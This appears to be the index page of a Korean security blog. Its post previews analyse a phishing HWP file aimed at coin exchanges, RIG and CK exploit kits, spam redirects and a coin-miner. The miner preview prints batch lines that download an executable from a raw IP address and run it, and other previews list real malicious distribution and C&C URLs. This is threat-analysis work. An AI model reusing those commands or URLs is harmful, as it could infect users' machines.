본문 바로가기

security

[악성코드 유포] 코인(토큰) 상장 문의 메일을 통한 한글 악성코드 유포 분석 1. 개요 최근 APT(Advanced Persistent Threat) 공격이 증가하고 있는 추세입니다. 최근에는 코인 거래소가 활성화되고, 돈이 되면서 거래소의 관계자를 노리기 위한 공격이 주를 이루고 있습니다. 이번에 분석하게 된 파일은 코인 상장 신청서를 통해 주요 코인거래소에 유포된 것으로 확인된 한글 파일을 간단하게 분석하였습니다. “해당 메일은 코인원 계정에 발송된 것으로 확인되었습니다.” 2. 최초 이메일 발송 정보 2. 파일 정보 파일명 [WhitePaper+소개]신규코인_상장_신청서2.hwp MD5 95fe089b63c095bfb2b25e8c6914d19d 한글 파일 제목 EXRAYA 백서 파일 생성 날짜 2019년 11월 3일 일요일 오후 4:21:45 비밀번호 12345 3. 세부 .. 더보기
XMR CoinMiner (BAT + Hashfish) 안녕하세요? 올만에 글을 쓰게 됩니다. 이번에 글을 쓰는 이유는 올만에 파일을 발견하였기 때문입니다. 간락히 쓰고 그냥 MD5 공유 하려고 합니다. 1. dll.bat - 인터넷에서 감염 추정 (8월 16일) / 파일 발견 일자 (9월 17일) 2. .bat 파일 구조 3. .bat 파일 실행 구조 (핵심) @echo off (웹 다운로드 부분) taskkill /im 3.exe /f md c:\windows\hashfish del c:\windows\hashfish\3.exe call :http "http://120.236.74.201:74/3.exe" c:\windows\hashfish\3.exe // SFX 압축 파일 (채굴 위한 악성코드) ping 127.0.0.1 -n 2 >nul if exis.. 더보기
CK Exploit Kit 4.13에 대한 간단 정리 회사를 퇴사하고 나서 가끔씩 글을 쓸 예정 입니다.정보가 많이 부족하긴 하지만 악성 스크립트 (국내 + 해외) / 파일분석 등을 적을 예정 입니다.포스팅을 하는 이유는 그냥 심심해서 입니다. 1. 발견 사이트 (유포지) cocoalba.kr/autojump/ad_xxxx/index.html 2. 최종 파일leeve.co.kr/apps/up.exe (현재 404)MD5 : 0952d38bf8b3f026cb3c41c87db338a7C&C : r.pengyou.com/fcg-bin/cgi_get_portrait.fcg?uins=2889622357[VT 결과]virustotal.com/ko/file/1dd1dbd6631b8b0b87d7bbab7aff004c983dbe87ba6c9e7fed851de4786e6ae.. 더보기
국내 웹사이트를 통해 유포되는 RIG Exploit Kit 아직도 유포중 - 간단히 끄적끄적 그냥 국내 웹사이트 중 리그킷 들어가 있는 곳을 발견해서 간단하게 흔적용으로 써봄. 1. 발견 사이트 http://www.irisxxxxxx.kr (꽃배달 사이트) → http://autoxxxx.ru/templates/atomic/z9jqqbt7.php?id=8515037 -→ http://new.ceptenporxxxxx.com/?xH6Af7iYJBvPCoo[하위생략] / (지속적인 링크 변경) --→ http://new.ceptenporxxxxxx.com/index.php?xH6Af7iYJBvPCoo=[하위생략] / 최종 악성코드 다운로드 2. 삽입 형태 http://www.irisxxxxxx.kr → _script type="text/javascript" src="http://autoxxxx.ru.. 더보기
RIG Exploit Kit 넌 누구냐? 올만에 블로그에 글을~간단하게 스샷 몇개만 ... 추후에 자세히?!? 1. 초기 스크립트 2. 1차 난독화 해제 3. 2차 난독화 해제 (취약성 + 최종 링크) 간단하게 정리 했습니다. 정보는 추후에 봐서 공유 하도록 하겠습니다. 마지막으로 도움을 주신 모든분께 감사하다는 말씀 드리고 싶습니다. 더보기
[Web Developer Forum - 2012.06.13] Malicious Code Inject: What Does It Do? 우연히 인터넷 검색을 하던 도중 발견한 2012년 해외 포럼에 올라온 글이다. Malicious Code Inject: What Does It Do? 라는 것을 보던 중에 오래된 방법이지만 이런 방법도 있구나 해서 적어놓는다. 1. 발견지 포럼(Web Developer Forum) : http://www.webdeveloper.com/forum/showthread.php?261600-Malicious-Code-Inject-What-Does-It-Do (Malicious Code Inject: What Does It Do?)-> http://oolbrmp.tld.cc/d/404.php?go=1 (window.location _=_ "http://fukbb.com")--> http://fukbb.com 2... 더보기
[악성 스크립트로 연결하는 스팸메일] I want you to be healthy 오랜만에 악성스크립트로 연결시키는 스팸메일을 내 이메일을 통해 받아서 기록해 둔다. 발신 : 수신 : 날짜 : 13-10-21 (월) 03:21제목 : I want you to be healthy [본문 내용] http://mhr.ro/pride.html Do you know what your lover wants during nights? [발신자 정보 위치 - bladechevy.com] [http://mhr.ro/pride.html - 사이트 본문 내용] [디코딩] Redirecting -> http://albertacanadapills.nl"> --------------------------------------------------------------------------------------.. 더보기
[Sophos] 메일함을 감염시키는 Secure Google Docs http://securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=23100 Google Docs으로 부터 여러분에게 보내진 “보안문서(Secure Document)”인척 하는 대규모의 피싱 공격이 이번 주 동안 유행하였습니다.보안업계에 종사하는 우리 같은 사람들은 놀라지 않을지도 모르지만, 피싱 공격들은 전통적인 방어를 피하는 매우 효과적인 방법들 중의 하나임을 스스로 증명하고 있습니다.많은 기관들이 Google 클라우드로 옮겨감에 따라, 이런 류의 피싱 미끼는 계속해서 범죄용으로 사용되는 결과를 낳을 것입니다.그 이메일은 다음과 같습니다.:안녕하세요. 당신의 금융기관에서 Google Docs를 사용한 보안 문서를 보내었습니다. 문서를 보기 위해 Go.. 더보기
TCP/IP 프로토콜 아키텍처 출처 : http://www.microsoft.com/korea/technet/deploy/tcpintro4.mspx TCP/IP에 대한 소개TCP/IP 프로토콜 아키텍처TCP/IP 프로토콜은 DARPA 모델(TCP/IP를 개발한 미 정보 조직의 이름을 딴)로 알려진 네 계층의 개념적인 모델에 맵핑 되어 있습니다. DARPA 모델의 네 계층은 애플리케이션(Application), 트랜스포트(transport), 인터넷(Internet), 네트워크(Network) 인터페이스입니다. DARPA 모델의 각 계층은 OSI(Open Systems Interconnection) 7계층 모델의 하나, 혹은 하나 이상의 계층과 일치합니다.그림 1은 TCP/IP 프로토콜 계층 구조를 보여줍니다. 그림 1 TCP/IP 프.. 더보기
[Sophos] 데이터 침해, 절반 이상은 부주의 때문이라고 ICO는 전합니다. http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=22900 2013년 1분기에 일어난 데이터 침해 대부분은 정보가 처리되었던 방법에 있어서의 부주의 때문에 발생하였습니다.영국 ICO(정보보호위원회, Information Commissioner's Office)에 따르면, 4월1일 ~ 6월30일 사이에 조사했던 335개 사건 중 175건이 “잘못해서 공개된(disclosed in error)” 개인 정보 때문이라고 합니다.ICO의 Sally-Anne Poole(Enforcement group manager, Civil investigations)은 ICO 블로그에서, 그런 에러들에는 많은 이유가 있었다고 전합니다."잘못된 사람들에.. 더보기